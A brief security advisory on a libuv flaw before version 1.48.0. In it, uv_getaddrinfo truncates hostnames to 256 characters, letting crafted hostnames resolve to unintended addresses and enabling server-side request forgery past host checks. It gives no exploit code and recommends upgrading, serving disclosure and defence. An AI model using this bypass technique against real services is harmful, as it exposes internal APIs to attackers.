Arash16

**Name of the Vulnerable Software and Affected Versions** libuv versions prior to 1.48.0 **Description** The issue arises due to the handling of the `hostname ascii` variable in the `uv getaddrinfo` function, which truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses that are considered valid by `getaddrinfo`, allowing an attacker to craft payloads that resolve to unintended IP addresses and bypass developer checks. The vulnerability may enable attackers to access internal APIs or expose internal services to Server-Side Request Forgery (SSRF) attacks. **Recommendations** For versions prior to 1.48.0, upgrade to version 1.48.0 or later to resolve the issue. As a temporary workaround, consider restricting the use of the `uv getaddrinfo` function until a patch is available. Avoid using hostnames that exceed 256 characters in the affected API endpoints until the issue is resolved.